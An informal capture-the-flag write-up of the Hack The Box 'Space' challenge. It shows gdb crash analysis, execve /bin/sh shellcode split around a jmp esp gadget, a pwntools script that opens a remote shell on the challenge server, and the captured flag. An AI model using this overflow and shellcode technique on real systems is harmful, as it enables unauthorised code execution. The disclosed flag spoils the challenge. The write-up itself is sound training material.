roaming in a small space
$ file space
space: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=90e5767272e16e26e1980cb78be61437b3d63e12, not stripped
$ checksec space
[*] '/home/kali/0.htb/challenges/Pwn/Space/space'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
$ strings space
$ readelf -a space
$ nm space
$ objdump space
$ r2 -A space
[0x08049080]> afl list functions (addr, size, bbs, name) (see afll)
[0x08049080]> pdf@main disassemble function
[0x08049080]> pdf@vunl
$gdb space
gef➤ checksec
[+] checksec for '/home/kali/0.htb/challenges/Pwn/Space/space'
Canary : ✘
NX : ✘
PIE : ✘
Fortify : ✘
RelRO
gef➤ pattern create 50
[+] Generating a pattern of 50 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
[+] Saved as '$_gef0'
gef➤ run
Starting program: /home/kali/0.htb/challenges/Pwn/Space/space
> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
Program received signal SIGSEGV, Segmentation fault.
0x61666161 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0xffffd0ca → 0x61616161 ("aaaa"?)
$ebx : 0x61646161 ("aada"?)
$ecx : 0xffffd110 → 0xffffd130 → 0x00000001
$edx : 0xffffd0e9 → 0xffffd130 → 0x00000001
$esp : 0xffffd0e0 → 0x61676161 ("aaga"?)
$ebp : 0x61656161 ("aaea"?)
$esi : 0xf7faa000 → 0x001e4d6c
$edi : 0xf7faa000 → 0x001e4d6c
$eip : 0x61666161 ("aafa"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd0e0│+0x0000: 0x61676161 ← $esp
0xffffd0e4│+0x0004: 0x61686161
0xffffd0e8│+0x0008: 0xffd13061
0xffffd0ec│+0x000c: 0x080400ff
0xffffd0f0│+0x0010: 0x616161fc
0xffffd0f4│+0x0014: 0x61616261
0xffffd0f8│+0x0018: 0x61616361
0xffffd0fc│+0x001c: 0x61616461
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x61666161
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "space", stopped 0x61666161 in ?? (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ aiaaajaaakaaalaaama
Undefined command: "aiaaajaaakaaalaaama". Try "help".
gef➤ pattern search aafa
[+] Searching 'aafa'
[+] Found at offset 19 (little-endian search) likely
[+] Found at offset 18 (big-endian search)
gef➤
gef➤ run
Starting program: /home/kali/0.htb/challenges/Pwn/Space/space
> AAAAAAAAAAAAAAAAAABBBBBBBBCCCCCCCCCCCCCCCCCC
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0xffffd0ca → 0x41414141 ("AAAA"?)
$ebx : 0x41414141 ("AAAA"?)
$ecx : 0xffffd110 → 0xffffd130 → 0x00000001
$edx : 0xffffd0e9 → 0xffffd130 → 0x00000001
$esp : 0xffffd0e0 → 0x42424242 ("BBBB"?)
$ebp : 0x41414141 ("AAAA"?)
$esi : 0xf7faa000 → 0x001e4d6c
$edi : 0xf7faa000 → 0x001e4d6c
$eip : 0x42424242 ("BBBB"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd0e0│+0x0000: 0x42424242 ← $esp
0xffffd0e4│+0x0004: 0x43434343
0xffffd0e8│+0x0008: 0xffd13043
0xffffd0ec│+0x000c: 0x080400ff
0xffffd0f0│+0x0010: 0x414141fc
0xffffd0f4│+0x0014: 0x41414141
0xffffd0f8│+0x0018: 0x41414141
0xffffd0fc│+0x001c: 0x41414141
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x42424242
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "space", stopped 0x42424242 in ?? (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ CCCCCCCCCCCCC
Undefined command: "CCCCCCCCCCCCC". Try "help".
gef➤ x/30x $esp
0xffffd0e0: 0x42424242 0x43434343 0xffd13043 0x080400ff
0xffffd0f0: 0x414141fc 0x41414141 0x41414141 0x41414141
0xffffd100: 0x42414141 0x42424242 0x43424242 0x43434343
0xffffd110: 0xffffd130 0x00000000 0x00000000 0xf7de3e46
0xffffd120: 0xf7faa000 0xf7faa000 0x00000000 0xf7de3e46
0xffffd130: 0x00000001 0xffffd1d4 0xffffd1dc 0xffffd164
0xffffd140: 0xffffd174 0xf7ffdb40 0xf7fcb410 0xf7faa000
0xffffd150: 0x00000001 0x00000000
gef➤
shellcode from
[SECTION .text]
global _start
_start:
xor edx,edx ; edx = 0 (it will be used as *envp = NULL)
xor eax,eax ; eax = 0 (it will be used as a null-terminating char)
push eax
push 0x68732f2f
push 0x6e69622f ; here you got /bin//sh\x00 on the stack
mov ebx,esp ; ebx <- esp; ebx points to /bin//sh\x00
mov al, 0xb ; al = 0xb, 11, execve syscall id
int 0x80 ; execve("/bin//sh\x00",Null,Null)
modified shellcode, shellcode.asm..
[SECTION .text]
global _start
_start:
xor edx,edx ; edx = 0 (it will be used as *envp = NULL)
xor eax,eax ; eax = 0 (it will be used as a null-terminating char)
sub esp,0x16
jmp esp ;"this will jump 22 steps bac;k on esp"
;so we split it here , above shellcode goes after eip and below will before eip"
push eax
push 0x68732f2f
push 0x6e69622f ; here you got /bin//sh\x00 on the stack
mov ebx,esp ; ebx <- esp; ebx points to /bin//sh\x00
mov al, 0xb ; al = 0xb, 11, execve syscall id
int 0x80 ; execve("/bin//sh\x00",Null,Null)
$ nasm -f elf32 -l shellcode shellcode.asm
$ objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xd2\x31\xc0\x83\xec\x16\xff\xe4\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
to fit the shell code into small space we split it into two parts:
\x31\xd2\x31\xc0\x83\xec\x16\xff\xe4 \x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
paylaod = 'a' + last_part + jmp_esp + first_part
so here’s the idea 'a' + last_part = 18bits(require to reach eip ) + jmp_esp (return function which will return to first_part) + first_part(which will return to last_part)
before writing our final exploit we will need jmp_esp address from the binary ,lets heck the address with ropper.
kali@kali:~/0.htb/challenges/Pwn/Space$ ropper
(ropper)> file space
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[INFO] Load gadgets for section: GNU_STACK
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] File loaded.
(space/ELF/x86)> search /1/ jmp esp
[INFO] Searching for gadgets: jmp esp
[INFO] File: space
0x0804919f: jmp esp;
(space/ELF/x86)>
final exploit
space.py
from pwn import *
context.terminal = ['urxvt','-e','sh','-c']
context.log_level = 'DEBUG'
sh = remote("206.189.121.131",31923)
jmp_esp = p32(0x0804919f)
first_part = b'\x31\xd2\x31\xc0\x83\xec\x15\xff\xe4'
last_part = b'\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload = b'a' + last_part + jmp_esp + first_part
sh.sendlineafter("> ",payload)
sh.interactive()
$ python3 space.py
[+] Opening connection to 206.189.121.131 on port 31923: Done
[DEBUG] Received 0x2 bytes:
b'> '
[DEBUG] Sent 0x20 bytes:
00000000 61 50 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 b0 0b │aPh/│/shh│/bin│····│
00000010 cd 80 9f 91 04 08 31 d2 31 c0 83 ec 15 ff e4 0a │····│··1·│1···│····│
00000020
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
b'ls\n'
[DEBUG] Received 0x20 bytes:
b'flag.txt\n'
b'run_challenge.sh\n'
b'space\n'
flag.txt
run_challenge.sh
space
$ cat flag.txt
[DEBUG] Sent 0xd bytes:
b'cat flag.txt\n'
[DEBUG] Received 0x1c bytes:
b'HTB{sh3llc0de_1n_7h3_5p4c3}\n'
HTB{sh3llc0de_1n_7h3_5p4c3}
$ cat run_challenge.sh
[DEBUG] Sent 0x15 bytes:
b'cat run_challenge.sh\n'
[DEBUG] Received 0x24 bytes:
b'#!/bin/bash\n'
b'\n'
b'cd /home/ctf && ./space'
#!/bin/bash
cd /home/ctf && ./space$
ghidra
void vuln(char *param_1)
{
char local_12 [10];
strcpy(local_12,param_1);
return;
}
undefined4 main(void)
{
undefined local_2f [31];
undefined *local_10;
local_10 = &stack0x00000004;
printf("> ");
fflush(stdout);
read(0,local_2f,0x1f);
vuln(local_2f);
return 0;
}